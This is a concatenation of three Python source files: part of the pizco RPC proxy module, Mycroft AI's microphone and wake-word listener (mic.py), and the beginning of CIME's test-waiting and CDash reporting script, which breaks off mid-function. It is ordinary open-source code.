fut.set_exception(content['exception'])
else:
fut.set_result(content['result'])
def on_notification(self, sender, topic, content, msgid):
try:
self._signals[(sender, topic)].emit(*content)
except KeyError:
super(ProxyAgent, self).on_notification(
sender, topic, content, msgid)
def instantiate(self, served_cls, args, kwargs):
if not isinstance(served_cls, str):
served_cls = served_cls.__module__ + '.' + served_cls.__name__
self.request_server('instantiate', {'class': served_cls, 'args': args, 'kwargs': kwargs})
def _except_hook(type, value, tb):
for item in traceback.format_exception(type, value, tb)[:-1] + getattr(value, '_pzc_traceback', []):
if HIDE_TRACEBACK and 'pizco.py' in item:
continue
sys.stderr.write(item)
def set_excepthook():
sys.excepthook = _except_hook
class Proxy(object):
"""Proxy object to access a server.
:param remote_endpoint: endpoint of the server.
"""
def __init__(self, remote_endpoint):
self._proxy_agent = ProxyAgent(remote_endpoint)
self._proxy_attr_as_remote, self._proxy_attr_as_object = self._proxy_agent.request_server('inspect', {})
def __getattr__(self, item):
if item.startswith('_proxy_'):
return super(Proxy, self).__getattr__(item)
if item in self._proxy_attr_as_remote:
return RemoteAttribute(item, self._proxy_agent.request_server, self._proxy_agent.signal_manager)
return self._proxy_agent.request_server('get', {'name': item}, item in self._proxy_attr_as_object)
def __setattr__(self, item, value):
if item.startswith('_proxy_'):
super(Proxy, self).__setattr__(item, value)
return
return self._proxy_agent.request_server('setattr', {'name': item, 'value': value})
def _proxy_stop_server(self):
self._proxy_agent.request(self._proxy_agent.remote_rep_endpoint, 'stop')
def _proxy_stop_me(self):
self._proxy_agent.stop()
def __del__(self):
self._proxy_agent.stop()
|
mic.py | # Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import audioop
from time import sleep, time as get_time
from collections import deque, namedtuple
import datetime
import json
import os
from os.path import isdir, join
import pyaudio
import requests
import speech_recognition
from hashlib import md5
from io import BytesIO, StringIO
from speech_recognition import (
Microphone,
AudioSource,
AudioData
)
from tempfile import gettempdir
from threading import Thread, Lock
from mycroft.api import DeviceApi
from mycroft.configuration import Configuration
from mycroft.session import SessionManager
from mycroft.util import (
check_for_signal,
get_ipc_directory,
resolve_resource_file,
play_wav
)
from mycroft.util.log import LOG
from .data_structures import RollingMean, CyclicAudioBuffer
#Lets see if we can dump DOA on the bus using hid - already added to requirement/requirements.txt
#Commenting this out for now since I can't get it to connect
#import hid # https://pypi.python.org/pypi/hidapi aka https://github.com/trezor/cython-hidapi
WakeWordData = namedtuple('WakeWordData',
['audio', 'found', 'stopped', 'end_audio'])
class MutableStream:
def __init__(self, wrapped_stream, format, muted=False):
assert wrapped_stream is not None
self.wrapped_stream = wrapped_stream
self.SAMPLE_WIDTH = pyaudio.get_sample_size(format)
self.muted_buffer = b''.join([b'\x00' * self.SAMPLE_WIDTH])
self.read_lock = Lock()
self.muted = muted
if muted:
self.mute()
def mute(self):
"""Stop the stream and set the muted flag."""
with self.read_lock:
self.muted = True
self.wrapped_stream.stop_stream()
def unmute(self):
"""Start the stream and clear the muted flag."""
with self.read_lock:
self.muted = False
self.wrapped_stream.start_stream()
def read(self, size, of_exc=False):
"""Read data from stream.
Args:
size (int): Number of bytes to read
of_exc (bool): flag determining if the audio producer thread
should throw IOError at overflows.
Returns:
(bytes) Data read from device
"""
frames = deque()
remaining = size
with self.read_lock:
while remaining > 0:
# If muted during read return empty buffer. This ensures no
# reads occur while the stream is stopped
if self.muted:
return self.muted_buffer
to_read = min(self.wrapped_stream.get_read_available(),
remaining)
if to_read <= 0:
sleep(.01)
continue
result = self.wrapped_stream.read(to_read,
exception_on_overflow=of_exc)
frames.append(result)
remaining -= to_read
input_latency = self.wrapped_stream.get_input_latency()
if input_latency > 0.2:
LOG.warning("High input latency: %f" % input_latency)
audio = b"".join(list(frames))
return audio
def close(self):
self.wrapped_stream.close()
self.wrapped_stream = None
def is_stopped(self):
try:
return self.wrapped_stream.is_stopped()
except Exception as e:
LOG.error(repr(e))
return True # Assume the stream has been closed and thusly stopped
def stop_stream(self):
return self.wrapped_stream.stop_stream()
class MutableMicrophone(Microphone):
def __init__(self, device_index=None, sample_rate=16000, chunk_size=1024,
mute=False):
Microphone.__init__(self, device_index=device_index,
sample_rate=sample_rate, chunk_size=chunk_size)
self.muted = False
if mute:
self.mute()
def __enter__(self):
return self._start()
def _start(self):
"""Open the selected device and setup the stream."""
assert self.stream is None, \
"This audio source is already inside a context manager"
self.audio = pyaudio.PyAudio()
self.stream = MutableStream(self.audio.open(
input_device_index=self.device_index, channels=1,
format=self.format, rate=self.SAMPLE_RATE,
frames_per_buffer=self.CHUNK,
input=True, # stream is an input stream
), self.format, self.muted)
return self
def __exit__(self, exc_type, exc_value, traceback):
return self._stop()
def _stop(self):
"""Stop and close an open stream."""
try:
if not self.stream.is_stopped():
self.stream.stop_stream()
self.stream.close()
except Exception:
LOG.exception('Failed to stop mic input stream')
# Let's pretend nothing is wrong...
self.stream = None
self.audio.terminate()
def restart(self):
"""Shutdown input device and restart."""
self._stop()
self._start()
def mute(self):
self.muted = True
if self.stream:
self.stream.mute()
def unmute(self):
self.muted = False
if self.stream:
self.stream.unmute()
def is_muted(self):
return self.muted
def duration_to_bytes(self, sec):
"""Converts a duration in seconds to number of recorded bytes.
Args:
sec: number of seconds
Returns:
(int) equivalent number of bytes recorded by this Mic
"""
return int(sec * self.SAMPLE_RATE) * self.SAMPLE_WIDTH
def get_silence(num_bytes):
return b'\0' * num_bytes
class NoiseTracker:
"""Noise tracker, used to deterimine if an audio utterance is complete.
The current implementation expects a number of loud chunks (not necessary
in one continous sequence) followed by a short period of continous quiet
audio data to be considered complete.
Args:
minimum (int): lower noise level will be threshold for "quiet" level
maximum (int): ceiling of noise level
sec_per_buffer (float): the length of each buffer used when updating
the tracker
loud_time_limit (float): time in seconds of low noise to be considered
a complete sentence
silence_time_limit (float): time limit for silence to abort sentence
silence_after_loud (float): time of silence to finalize the sentence.
default 0.25 seconds.
"""
def __init__(self, minimum, maximum, sec_per_buffer, loud_time_limit,
silence_time_limit, silence_after_loud_time=0.25):
self.min_level = minimum
self.max_level = maximum
self.sec_per_buffer = sec_per_buffer
self.num_loud_chunks = 0
self.level = 0
# Smallest number of loud chunks required to return loud enough
self.min_loud_chunks = int(loud_time_limit / sec_per_buffer)
self.max_silence_duration = silence_time_limit
self.silence_duration = 0
# time of quite period after long enough loud data to consider the
# sentence complete
self.silence_after_loud = silence_after_loud_time
# Constants
self.increase_multiplier = 200
self.decrease_multiplier = 100
def _increase_noise(self):
"""Bumps the current level.
Modifies the noise level with a factor depending in the buffer length.
"""
if self.level < self.max_level:
self.level += self.increase_multiplier * self.sec_per_buffer
def _decrease_noise(self):
"""Decrease the current level.
Modifies the noise level with a factor depending in the buffer length.
"""
if self.level > self.min_level:
self.level -= self.decrease_multiplier * self.sec_per_buffer
def update(self, is_loud):
"""Update the tracking. with either a loud chunk or a quiet chunk.
Args:
is_loud: True if a loud chunk should be registered
False if a quiet chunk should be registered
"""
if is_loud:
self._increase_noise()
self.num_loud_chunks += 1
else:
self._decrease_noise()
# Update duration of energy under the threshold level
if self._quiet_enough():
self.silence_duration += self.sec_per_buffer
else: # Reset silence duration
self.silence_duration = 0
def _loud_enough(self):
"""Check if the noise loudness criteria is fulfilled.
The noise is considered loud enough if it's been over the threshold
for a certain number of chunks (accumulated, not in a row).
"""
return self.num_loud_chunks > self.min_loud_chunks
def _quiet_enough(self):
"""Check if the noise quietness criteria is fulfilled.
The quiet level is instant and will return True if the level is lower
or equal to the minimum noise level.
"""
return self.level <= self.min_level
def recording_complete(self):
"""Has the end creteria for the recording been met.
If the noise level has decresed from a loud level to a low level
the user has stopped speaking.
Alternatively if a lot of silence was recorded without detecting
a loud enough phrase.
"""
too_much_silence = (self.silence_duration > self.max_silence_duration)
if too_much_silence:
LOG.debug('Too much silence recorded without start of sentence '
'detected')
return ((self._quiet_enough() and
self.silence_duration > self.silence_after_loud) and
(self._loud_enough() or too_much_silence))
class ResponsiveRecognizer(speech_recognition.Recognizer):
# Padding of silence when feeding to pocketsphinx
SILENCE_SEC = 0.01
# The minimum seconds of noise before a
# phrase can be considered complete
MIN_LOUD_SEC_PER_PHRASE = 0.5
# The minimum seconds of silence required at the end
# before a phrase will be considered complete
MIN_SILENCE_AT_END = 0.25
# Time between pocketsphinx checks for the wake word
SEC_BETWEEN_WW_CHECKS = 0.2
# Set up the HID driver
# Have to doublecheck these are the right ones
#RESPEAKER_VENDOR_ID = 0x2886
#RESPEAKER_PRODUCT_ID = 0x07
#_dev = hid.device()
#_dev.open(RESPEAKER_VENDOR_ID, RESPEAKER_PRODUCT_ID)
def __init__(self, wake_word_recognizer, watchdog=None):
self._watchdog = watchdog or (lambda: None) # Default to dummy func
self.config = Configuration.get()
listener_config = self.config.get('listener')
self.upload_url = listener_config['wake_word_upload']['url']
self.upload_disabled = listener_config['wake_word_upload']['disable']
self.wake_word_name = wake_word_recognizer.key_phrase
self.overflow_exc = listener_config.get('overflow_exception', False)
super().__init__()
self.wake_word_recognizer = wake_word_recognizer
self.audio = pyaudio.PyAudio()
self.multiplier = listener_config.get('multiplier')
self.energy_ratio = listener_config.get('energy_ratio')
# Check the config for the flag to save wake words, utterances
# and for a path under which to save them
self.save_utterances = listener_config.get('save_utterances', False)
self.save_wake_words = listener_config.get('record_wake_words', False)
self.save_path = listener_config.get('save_path', gettempdir())
self.saved_wake_words_dir = join(self.save_path, 'mycroft_wake_words')
if self.save_wake_words and not isdir(self.saved_wake_words_dir):
os.mkdir(self.saved_wake_words_dir)
self.saved_utterances_dir = join(self.save_path, 'mycroft_utterances')
if self.save_utterances and not isdir(self.saved_utterances_dir):
os.mkdir(self.saved_utterances_dir)
self.mic_level_file = os.path.join(get_ipc_directory(), "mic_level")
# Signal statuses
self._stop_signaled = False
self._listen_triggered = False
self._account_id = None
# The maximum seconds a phrase can be recorded,
# provided there is noise the entire time
self.recording_timeout = listener_config.get('recording_timeout',
10.0)
# The maximum time it will continue to record silence
# when not enough noise has been detected
self.recording_timeout_with_silence = listener_config.get(
'recording_timeout_with_silence', 3.0)
@property
def account_id(self):
"""Fetch account from backend when needed.
If an error occurs it's handled and a temporary value is returned.
When a value is received it will be cached until next start.
"""
if not self._account_id:
try:
self._account_id = DeviceApi().get()['user']['uuid']
except (requests.RequestException, AttributeError):
pass # These are expected and won't be reported
except Exception as e:
LOG.debug('Unhandled exception while determining device_id, '
'Error: {}'.format(repr(e)))
return self._account_id or '0'
def record_sound_chunk(self, source):
return source.stream.read(source.CHUNK, self.overflow_exc)
@staticmethod
def calc_energy(sound_chunk, sample_width):
return audioop.rms(sound_chunk, sample_width)
# See if there's any auto report (VAD and voice angle), if not, return immediately with None
def read_auto_report():
# Temporarily turn off blocking, the auto report only comes in on VAD changes
_dev.set_nonblocking(1)
ret = _dev.read(9)
_dev.set_nonblocking(0)
if(len(ret)):
# Make sure it's the auto report register (0xFF)
if(ret[0] == 0xFF):
# Angle is two bytes
angle = ret[6]*256 + ret[5]
# VAD is 2 for speaking, 0 for not, 1 for ???
vad = ret[4]
return (angle, vad)
return (None, None)
def _record_phrase(
self,
source,
sec_per_buffer,
stream=None,
ww_frames=None
):
"""Record an entire spoken phrase.
Essentially, this code waits for a period of silence and then returns
the audio. If silence isn't detected, it will terminate and return
a buffer of self.recording_timeout duration.
Args:
source (AudioSource): Source producing the audio chunks
sec_per_buffer (float): Fractional number of seconds in each chunk
stream (AudioStreamHandler): Stream target that will receive chunks
of the utterance audio while it is
being recorded.
ww_frames (deque): Frames of audio data from the last part of wake
word detection.
Returns:
bytearray: complete audio buffer recorded, including any
silence at the end of the user's utterance
"""
noise_tracker = NoiseTracker(0, 25, sec_per_buffer,
self.MIN_LOUD_SEC_PER_PHRASE,
self.recording_timeout_with_silence)
# Maximum number of chunks to record before timing out
max_chunks = int(self.recording_timeout / sec_per_buffer)
num_chunks = 0
# bytearray to store audio in, initialized with a single sample of
# silence.
byte_data = get_silence(source.SAMPLE_WIDTH)
if stream:
stream.stream_start()
phrase_complete = False
while num_chunks < max_chunks and not phrase_complete:
if ww_frames:
chunk = ww_frames.popleft()
else:
chunk = self.record_sound_chunk(source)
byte_data += chunk
num_chunks += 1
if stream:
stream.stream_chunk(chunk)
energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
test_threshold = self.energy_threshold * self.multiplier
is_loud = energy > test_threshold
noise_tracker.update(is_loud)
if not is_loud:
self._adjust_threshold(energy, sec_per_buffer)
# The phrase is complete if the noise_tracker end of sentence
# criteria is met or if the top-button is pressed
phrase_complete = (noise_tracker.recording_complete() or
check_for_signal('buttonPress'))
# Periodically write the energy level to the mic level file.
if num_chunks % 10 == 0:
self._watchdog()
self.write_mic_level(energy, source)
#Lets do the DOA here as wlel
#(angle, vad) = read_auto_report()
#emitter.emit("recognizer_loop:DOA", '{"angle":'+angle+', "vad":'+vad+'}')
return byte_data
def write_mic_level(self, energy, source):
with open(self.mic_level_file, 'w') as f:
f.write('Energy: cur={} thresh={:.3f} muted={}'.format(
energy,
self.energy_threshold,
int(source.muted)
)
)
def _skip_wake_word(self):
"""Check if told programatically to skip the wake word
For example when we are in a dialog with the user.
"""
if self._listen_triggered:
return True
# Pressing the Mark 1 button can start recording (unless
# it is being used to mean 'stop' instead)
if check_for_signal('buttonPress', 1):
# give other processes time to consume this signal if
# it was meant to be a 'stop'
sleep(0.25)
if check_for_signal('buttonPress'):
# Signal is still here, assume it was intended to
# begin recording
LOG.debug("Button Pressed, wakeword not needed")
return True
return False
def stop(self):
"""Signal stop and exit waiting state."""
self._stop_signaled = True
def _compile_metadata(self):
ww_module = self.wake_word_recognizer.__class__.__name__
if ww_module == 'PreciseHotword':
model_path = self.wake_word_recognizer.precise_model
with open(model_path, 'rb') as f:
model_hash = md5(f.read()).hexdigest()
else:
model_hash = '0'
return {
'name': self.wake_word_name.replace(' ', '-'),
'engine': md5(ww_module.encode('utf-8')).hexdigest(),
'time': str(int(1000 * get_time())),
'sessionId': SessionManager.get().session_id,
'accountId': self.account_id,
'model': str(model_hash)
}
def trigger_listen(self):
"""Externally trigger listening."""
LOG.debug('Listen triggered from external source.')
self._listen_triggered = True
def _upload_wakeword(self, audio, metadata):
"""Upload the wakeword in a background thread."""
LOG.debug(
"Wakeword uploading has been disabled. The API endpoint used in "
"Mycroft-core v20.2 and below has been deprecated. To contribute "
"new wakeword samples please upgrade to v20.8 or above."
)
# def upload(audio, metadata):
# requests.post(self.upload_url,
# files={'audio': BytesIO(audio.get_wav_data()),
# 'metadata': StringIO(json.dumps(metadata))})
# Thread(target=upload, daemon=True, args=(audio, metadata)).start()
def _send_wakeword_info(self, emitter):
"""Send messagebus message indicating that a wakeword was received.
Args:
emitter: bus emitter to send information on.
"""
SessionManager.touch()
payload = {'utterance': self.wake_word_name,
'session': SessionManager.get().session_id}
emitter.emit("recognizer_loop:wakeword", payload)
def _write_wakeword_to_disk(self, audio, metadata):
"""Write wakeword to disk.
Args:
audio: Audio data to write
metadata: List of metadata about the captured wakeword
"""
filename = join(self.saved_wake_words_dir,
'_'.join(str(metadata[k]) for k in sorted(metadata)) +
'.wav')
with open(filename, 'wb') as f:
f.write(audio.get_wav_data())
def _handle_wakeword_found(self, audio_data, source):
"""Perform actions to be triggered after a wakeword is found.
This includes: emit event on messagebus that a wakeword is heard,
store wakeword to disk if configured and sending the wakeword data
to the cloud in case the user has opted into the data sharing.
"""
# Save and upload positive wake words as appropriate
upload_allowed = (self.config['opt_in'] and not self.upload_disabled)
if (self.save_wake_words or upload_allowed):
audio = self._create_audio_data(audio_data, source)
metadata = self._compile_metadata()
if self.save_wake_words:
# Save wake word locally
self._write_wakeword_to_disk(audio, metadata)
# Upload wake word for opt_in people
if upload_allowed:
self._upload_wakeword(audio, metadata)
def _wait_until_wake_word(self, source, sec_per_buffer):
"""Listen continuously on source until a wake word is spoken
Args:
source (AudioSource): Source producing the audio chunks
sec_per_buffer (float): Fractional number of seconds in each chunk
"""
# The maximum audio in seconds to keep for transcribing a phrase
# The wake word must fit in this time
ww_duration = self.wake_word_recognizer.expected_duration
ww_test_duration = max(3, ww_duration)
mic_write_counter = 0
num_silent_bytes = int(self.SILENCE_SEC * source.SAMPLE_RATE *
source.SAMPLE_WIDTH)
silence = get_silence(num_silent_bytes)
# Max bytes for byte_data before audio is removed from the front
max_size = source.duration_to_bytes(ww_duration)
test_size = source.duration_to_bytes(ww_test_duration)
audio_buffer = CyclicAudioBuffer(max_size, silence)
buffers_per_check = self.SEC_BETWEEN_WW_CHECKS / sec_per_buffer
buffers_since_check = 0.0
# Rolling buffer to track the audio energy (loudness) heard on
# the source recently. An average audio energy is maintained
# based on these levels.
average_samples = int(5 / sec_per_buffer) # average over last 5 secs
audio_mean = RollingMean(average_samples)
# These are frames immediately after wake word is detected
# that we want to keep to send to STT
ww_frames = deque(maxlen=7)
said_wake_word = False
audio_data = None
while (not said_wake_word and not self._stop_signaled and
not self._skip_wake_word()):
chunk = self.record_sound_chunk(source)
audio_buffer.append(chunk)
ww_frames.append(chunk)
energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
audio_mean.append_sample(energy)
if energy < self.energy_threshold * self.multiplier:
self._adjust_threshold(energy, sec_per_buffer)
# maintain the threshold using average
if self.energy_threshold < energy < audio_mean.value * 1.5:
# bump the threshold to just above this value
self.energy_threshold = energy * 1.2
# Periodically output energy level stats. This can be used to
# visualize the microphone input, e.g. a needle on a meter.
if mic_write_counter % 3:
self._watchdog()
self.write_mic_level(energy, source)
mic_write_counter += 1
buffers_since_check += 1.0
# Send chunk to wake_word_recognizer
self.wake_word_recognizer.update(chunk)
if buffers_since_check > buffers_per_check:
buffers_since_check -= buffers_per_check
audio_data = audio_buffer.get_last(test_size) + silence
said_wake_word = \
self.wake_word_recognizer.found_wake_word(audio_data)
self._listen_triggered = False
return WakeWordData(audio_data, said_wake_word,
self._stop_signaled, ww_frames)
@staticmethod
def _create_audio_data(raw_data, source):
"""
Constructs an AudioData instance with the same parameters
as the source and the specified frame_data
"""
return AudioData(raw_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def mute_and_confirm_listening(self, source):
audio_file = resolve_resource_file(
self.config.get('sounds').get('start_listening'))
if audio_file:
source.mute()
play_wav(audio_file).wait()
source.unmute()
return True
else:
return False
def listen(self, source, emitter, stream=None):
"""Listens for chunks of audio that Mycroft should perform STT on.
This will listen continuously for a wake-up-word, then return the
audio chunk containing the spoken phrase that comes immediately
afterwards.
Args:
source (AudioSource): Source producing the audio chunks
emitter (EventEmitter): Emitter for notifications of when recording
begins and ends.
stream (AudioStreamHandler): Stream target that will receive chunks
of the utterance audio while it is
being recorded
Returns:
AudioData: audio with the user's utterance, minus the wake-up-word
"""
assert isinstance(source, AudioSource), "Source must be an AudioSource"
# bytes_per_sec = source.SAMPLE_RATE * source.SAMPLE_WIDTH
sec_per_buffer = float(source.CHUNK) / source.SAMPLE_RATE
# Every time a new 'listen()' request begins, reset the threshold
# used for silence detection. This is as good of a reset point as
# any, as we expect the user and Mycroft to not be talking.
# NOTE: adjust_for_ambient_noise() doc claims it will stop early if
# speech is detected, but there is no code to actually do that.
self.adjust_for_ambient_noise(source, 1.0)
LOG.debug("Waiting for wake word...")
ww_data = self._wait_until_wake_word(source, sec_per_buffer)
ww_frames = None
if ww_data.found:
# If the wakeword was heard send it
self._send_wakeword_info(emitter)
self._handle_wakeword_found(ww_data.audio, source)
ww_frames = ww_data.end_audio
if ww_data.stopped:
# If the waiting returned from a stop signal
return
LOG.debug("Recording...")
# If enabled, play a wave file with a short sound to audibly
# indicate recording has begun.
if self.config.get('confirm_listening'):
if self.mute_and_confirm_listening(source):
# Clear frames from wakeword detctions since they're
# irrelevant after mute - play wav - unmute sequence
ww_frames = None
# Notify system of recording start
LOG.info("MIC: reording begins")
emitter.emit("recognizer_loop:record_begin")
frame_data = self._record_phrase(
source,
sec_per_buffer,
stream,
ww_frames
)
audio_data = self._create_audio_data(frame_data, source)
LOG.info("MIC: recording ends")
emitter.emit("recognizer_loop:record_end")
if self.save_utterances:
LOG.info("Recording utterance")
stamp = str(datetime.datetime.now())
filename = "/{}/{}.wav".format(
self.saved_utterances_dir,
stamp
)
with open(filename, 'wb') as filea:
filea.write(audio_data.get_wav_data())
LOG.debug("Thinking...")
return audio_data
def _adjust_threshold(self, energy, seconds_per_buffer):
if self.dynamic_energy_threshold and energy > 0:
# account for different chunk sizes and rates
damping = (
self.dynamic_energy_adjustment_damping ** seconds_per_buffer)
target_energy = energy * self.energy_ratio
self.energy_threshold = (
self.energy_threshold * damping +
target_energy * (1 - damping))
|
wait_for_tests.py | #pylint: disable=import-error
from six.moves import queue
import os, time, threading, socket, signal, shutil, glob
#pylint: disable=import-error
from distutils.spawn import find_executable
import logging
import xml.etree.ElementTree as xmlet
import CIME.utils
from CIME.utils import expect, Timeout, run_cmd_no_fail, safe_copy, CIMEError
from CIME.XML.machines import Machines
from CIME.test_status import *
from CIME.provenance import save_test_success
from CIME.case.case import Case
SIGNAL_RECEIVED = False
E3SM_MAIN_CDASH = "E3SM"
CDASH_DEFAULT_BUILD_GROUP = "ACME_Latest"
SLEEP_INTERVAL_SEC = .1
###############################################################################
def signal_handler(*_):
###############################################################################
global SIGNAL_RECEIVED
SIGNAL_RECEIVED = True
###############################################################################
def set_up_signal_handlers():
###############################################################################
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
###############################################################################
def get_test_time(test_path):
###############################################################################
ts = TestStatus(test_dir=test_path)
comment = ts.get_comment(RUN_PHASE)
if comment is None or "time=" not in comment:
logging.warning("No run-phase time data found in {}".format(test_path))
return 0
else:
time_data = [token for token in comment.split() if token.startswith("time=")][0]
return int(time_data.split("=")[1])
###############################################################################
def get_test_output(test_path):
###############################################################################
output_file = os.path.join(test_path, "TestStatus.log")
if (os.path.exists(output_file)):
return open(output_file, 'r').read()
else:
logging.warning("File '{}' not found".format(output_file))
return ""
###############################################################################
def create_cdash_xml_boiler(phase, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit):
###############################################################################
site_elem = xmlet.Element("Site")
if ("JENKINS_START_TIME" in os.environ):
time_info_str = "Total testing time: {:d} seconds".format(int(current_time) - int(os.environ["JENKINS_START_TIME"]))
else:
time_info_str = ""
site_elem.attrib["BuildName"] = cdash_build_name
site_elem.attrib["BuildStamp"] = "{}-{}".format(utc_time, cdash_build_group)
site_elem.attrib["Name"] = hostname
site_elem.attrib["OSName"] = "Linux"
site_elem.attrib["Hostname"] = hostname
site_elem.attrib["OSVersion"] = "Commit: {}{}".format(git_commit, time_info_str)
phase_elem = xmlet.SubElement(site_elem, phase)
xmlet.SubElement(phase_elem, "StartDateTime").text = time.ctime(current_time)
xmlet.SubElement(phase_elem, "Start{}Time".format("Test" if phase == "Testing" else phase)).text = str(int(current_time))
return site_elem, phase_elem
###############################################################################
def create_cdash_config_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, config_elem = create_cdash_xml_boiler("Configure", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
xmlet.SubElement(config_elem, "ConfigureCommand").text = "namelists"
config_results = []
for test_name in sorted(results):
test_status = results[test_name][1]
config_results.append("{} {} Config {}".format("" if test_status != NAMELIST_FAIL_STATUS else "CMake Warning:\n", test_name, "PASS" if test_status != NAMELIST_FAIL_STATUS else "NML DIFF"))
xmlet.SubElement(config_elem, "Log").text = "\n".join(config_results)
xmlet.SubElement(config_elem, "ConfigureStatus").text = "0"
xmlet.SubElement(config_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Configure.xml"))
###############################################################################
def create_cdash_build_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, build_elem = create_cdash_xml_boiler("Build", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
xmlet.SubElement(build_elem, "ConfigureCommand").text = "case.build"
build_results = []
for test_name in sorted(results):
build_results.append(test_name)
xmlet.SubElement(build_elem, "Log").text = "\n".join(build_results)
for idx, test_name in enumerate(sorted(results)):
test_path = results[test_name][0]
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
if get_test_time(test_norm_path) == 0:
error_elem = xmlet.SubElement(build_elem, "Error")
xmlet.SubElement(error_elem, "Text").text = test_name
xmlet.SubElement(error_elem, "BuildLogLine").text = str(idx)
xmlet.SubElement(error_elem, "PreContext").text = test_name
xmlet.SubElement(error_elem, "PostContext").text = ""
xmlet.SubElement(error_elem, "RepeatCount").text = "0"
xmlet.SubElement(build_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Build.xml"))
###############################################################################
def create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, testing_elem = create_cdash_xml_boiler("Testing", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
test_list_elem = xmlet.SubElement(testing_elem, "TestList")
for test_name in sorted(results):
xmlet.SubElement(test_list_elem, "Test").text = test_name
for test_name in sorted(results):
test_path, test_status = results[test_name]
test_passed = test_status in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS]
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
full_test_elem = xmlet.SubElement(testing_elem, "Test")
if test_passed:
full_test_elem.attrib["Status"] = "passed"
elif (test_status == TEST_PEND_STATUS):
full_test_elem.attrib["Status"] = "notrun"
else:
full_test_elem.attrib["Status"] = "failed"
xmlet.SubElement(full_test_elem, "Name").text = test_name
xmlet.SubElement(full_test_elem, "Path").text = test_norm_path
xmlet.SubElement(full_test_elem, "FullName").text = test_name
xmlet.SubElement(full_test_elem, "FullCommandLine")
# text ?
results_elem = xmlet.SubElement(full_test_elem, "Results")
named_measurements = (
("text/string", "Exit Code", test_status),
("text/string", "Exit Value", "0" if test_passed else "1"),
("numeric_double", "Execution Time", str(get_test_time(test_norm_path))),
("text/string", "Completion Status", "Not Completed" if test_status == TEST_PEND_STATUS else "Completed"),
("text/string", "Command line", "create_test")
)
for type_attr, name_attr, value in named_measurements:
named_measurement_elem = xmlet.SubElement(results_elem, "NamedMeasurement")
named_measurement_elem.attrib["type"] = type_attr
named_measurement_elem.attrib["name"] = name_attr
xmlet.SubElement(named_measurement_elem, "Value").text = value
measurement_elem = xmlet.SubElement(results_elem, "Measurement")
value_elem = xmlet.SubElement(measurement_elem, "Value")
value_elem.text = ''.join([item for item in get_test_output(test_norm_path) if ord(item) < 128])
xmlet.SubElement(testing_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Test.xml"))
###############################################################################
def create_cdash_xml_fakes(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname):
###############################################################################
# We assume all cases were created from the same code repo
first_result_case = os.path.dirname(list(results.items())[0][1][0])
try:
srcroot = run_cmd_no_fail("./xmlquery --value SRCROOT", from_dir=first_result_case)
except CIMEError:
# Use repo containing this script as last resort
srcroot = os.path.join(CIME.utils.get_cime_root(), "..")
git_commit = CIME.utils.get_current_commit(repo=srcroot)
data_rel_path = os.path.join("Testing", utc_time)
create_cdash_config_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
create_cdash_build_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
###############################################################################
def create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload):
###############################################################################
data_rel_path = os.path.join("Testing", utc_time)
try:
log_dir = "{}_logs".format(cdash_build_name)
need_to_upload = False
for test_name, test_data in results.items():
test_path, test_status = test_data
if test_status not in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS] or force_log_upload:
test_case_dir = os.path.dirname(test_path)
ts = TestStatus(test_case_dir)
build_status = ts.get_status(SHAREDLIB_BUILD_PHASE)
build_status = TEST_FAIL_STATUS if build_status == TEST_FAIL_STATUS else ts.get_status(MODEL_BUILD_PHASE)
run_status = ts.get_status(RUN_PHASE)
baseline_status = ts.get_status(BASELINE_PHASE)
if build_status == TEST_FAIL_STATUS or run_status == TEST_FAIL_STATUS or baseline_status == TEST_FAIL_STATUS or force_log_upload:
case_dirs = [test_case_dir]
case_base = os.path.basename(test_case_dir)
test_case2_dir = os.path.join(test_case_dir, "case2", case_base)
if os.path.exists(test_case2_dir):
case_dirs.append(test_case2_dir)
for case_dir in case_dirs:
param = "EXEROOT" if build_status == TEST_FAIL_STATUS else "RUNDIR"
log_src_dir = run_cmd_no_fail("./xmlquery {} --value".format(param), from_dir=case_dir)
log_dst_dir = os.path.join(log_dir, "{}{}_{}_logs".format(test_name, "" if case_dir == test_case_dir else ".case2", param))
os.makedirs(log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*log*")):
safe_copy(log_file, log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*.cprnc.out*")):
safe_copy(log_file, log_dst_dir)
need_to_upload = True
if (need_to_upload):
tarball = "{}.tar.gz".format(log_dir)
